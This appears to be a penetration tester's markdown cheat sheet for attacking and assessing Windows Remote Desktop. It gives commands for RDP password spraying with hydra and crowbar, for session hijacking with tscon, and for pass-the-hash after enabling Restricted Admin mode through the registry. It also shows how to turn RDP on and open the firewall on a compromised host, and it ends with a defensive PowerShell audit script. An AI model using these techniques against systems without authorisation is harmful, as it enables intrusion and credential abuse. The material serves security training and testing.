# RDP

## <mark style="color:yellow;">ABOUT</mark>

<mark style="color:red;">**Remote Desktop Protocol (RDP)**</mark> is a <mark style="color:purple;">**protocol**</mark> developed by **Microsoft** for remote access to a computer running the Windows OS. It carries display output and keyboard/mouse input for the **GUI**, encrypted, over **IP** networks. It works at the <mark style="color:yellow;">**Application Layer**</mark> of the **TCP/IP model**, typically on <mark style="color:yellow;">**TCP/3389.**</mark> If **Network Address Translation (NAT)** is used on the route between client and server, as is often the case with Internet connections, the client needs the server's public IP address to reach it. Transport encryption uses <mark style="color:yellow;">**TLS/SSL**</mark>.

## <mark style="color:yellow;">CONNECTING</mark>

### <mark style="color:blue;">Rdesktop</mark>

```bash
rdesktop -u venator17 -p 'amogus' -d domain.kek 13.13.13.13
```

### <mark style="color:blue;">Xfreerdp</mark>

#### Regular

```bash
xfreerdp /u:venator17 /p:amogus /v:13.13.13.13 /d:domain.kek /cert:ignore
```

#### With Port-Forwarding

```bash
# target a local port that is forwarded (e.g. via SSH or chisel) to the remote 3389
xfreerdp /u:venator17 /p:amogus /v:localhost:3389 /d:domain.kek /cert:ignore
```

#### Mounting a local dir

```bash
# /drive:<share name>,<local path> exposes the local directory inside the session
xfreerdp /v:13.13.13.13 /u:venator17 /p:amogus /drive:share,/home/venator17/Assessment123
```

### <mark style="color:blue;">Remmina (GUI)</mark>

```bash
remmina
```

## <mark style="color:yellow;">PASSWORD SPRAYING</mark>

### <mark style="color:blue;">Crowbar</mark>

```bash
crowbar -b rdp -s 13.13.13.13/32 -U users.txt -c 'amogus'
```

### <mark style="color:blue;">Hydra</mark>

```bash
hydra -L users.txt -p 'amogus' 13.13.13.13 rdp
```

## <mark style="color:yellow;">SESSION HIJACKING</mark>

<mark style="color:orange;">**We need SYSTEM privileges**</mark> and then use <mark style="color:green;">**tscon.exe**</mark>, which connects an existing session to another session's desktop [**\[LINK\]**](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/tscon)

```powershell
# connect session ID 13 to the session named V17
tscon 13 /dest:V17
```

## <mark style="color:yellow;">PASS-THE-HASH</mark>

By default, Windows has <mark style="color:green;">`Restricted Admin Mode`</mark> disabled, and we need to enable it by adding the registry value <mark style="color:green;">`DisableRestrictedAdmin`</mark> set to 0 under the Lsa key:

```powershell
# DisableRestrictedAdmin = 0 turns Restricted Admin mode ON
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
```

Then use <mark style="color:green;">**xfreerdp**</mark> with the NT hash instead of a password (Pass The Hash):

```bash
# /pth: takes the NT hash; works only while Restricted Admin mode is enabled on the target
xfreerdp /v:13.13.13.13 /u:venator17 /pth:12379NSKDFKSJDF20931C031
```

## <mark style="color:yellow;">ENABLE FROM SYSTEM</mark>

For example, I once needed to reach an internal host, so it was useful to turn on RDP and set up port forwarding. Here are the steps to do it:

1. Set the <mark style="color:green;">`fDenyTSConnections`</mark> registry value, which denies RDP connections while it is 1, to 0

```powershell
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

# Or the same thing with PowerShell, for convenience

Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0
```

2. Enable the built-in firewall rule group so RDP traffic is allowed in

```powershell
# double quotes work from both cmd.exe and PowerShell
netsh advfirewall firewall set rule group="remote desktop" new enable=yes
```
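An added audit script (my own, not part of the original notes) that reads back the settings the PASS-THE-HASH and ENABLE FROM SYSTEM sections change, together with the NLA setting and listening port, and reports the host's RDP posture; it assumes an elevated PowerShell on Windows 8 / Server 2012 or later, where `Get-NetFirewallRule` exists.

```powershell
# Audit RDP exposure on the local host (added example, not from the original notes).
# Registry paths and value names are the documented ones; the report layout is my own.

$ts  = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
$tcp = "$ts\WinStations\RDP-Tcp"
$lsa = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'

function Get-RegValue {
    param([string]$Path, [string]$Name, $Default = $null)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $Default }
}

# fDenyTSConnections: 1 = RDP refused (Windows default), 0 = RDP accepted
$deny = Get-RegValue $ts  'fDenyTSConnections' 1
# UserAuthentication: 1 = Network Level Authentication required before the logon screen
$nla  = Get-RegValue $tcp 'UserAuthentication' 0
# DisableRestrictedAdmin: 0 = Restricted Admin mode on (NT hash alone logs in over RDP)
$ra   = Get-RegValue $lsa 'DisableRestrictedAdmin' $null
# PortNumber: the listener port, in case it was moved off TCP/3389
$port = Get-RegValue $tcp 'PortNumber' 3389

$raState = if ($null -eq $ra) { 'not set (off)' } elseif ($ra -eq 0) { 'ON' } else { 'off' }

# Enabled rules in the built-in "Remote Desktop" firewall group (the group netsh enables above)
$fw = Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue |
      Where-Object { $_.Enabled -eq 'True' }

$report = [pscustomobject]@{
    RdpEnabled          = ($deny -eq 0)
    ListeningPort       = $port
    NlaRequired         = ($nla -eq 1)
    RestrictedAdminMode = $raState
    FirewallRulesOpen   = (@($fw).Count -gt 0)
}
$report | Format-List

# Findings a reviewer would flag
if ($report.RdpEnabled -and -not $report.NlaRequired) {
    Write-Warning 'RDP is enabled without NLA: unauthenticated clients reach the logon screen.'
}
if ($report.RestrictedAdminMode -eq 'ON') {
    Write-Warning 'Restricted Admin mode is on: a stolen NT hash is sufficient for RDP logon.'
}
```

Run it before and after the two steps above to confirm which of the changes actually took effect, and keep the warnings as the checklist for reverting them once the engagement ends.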

## <mark style="color:yellow;">Tips2Hack</mark>

1. **Nmap RDP Scan**

```bash
# quote the glob so the shell does not expand it against local files
nmap -sV -sC 13.13.13.13 -p3389 --script "rdp*"
```

2. **RDP Security Check** [**\[LINK\]**](https://github.com/CiscoCXSecurity/rdp-sec-check)

```bash
./rdp-sec-check.pl 13.13.13.13
```
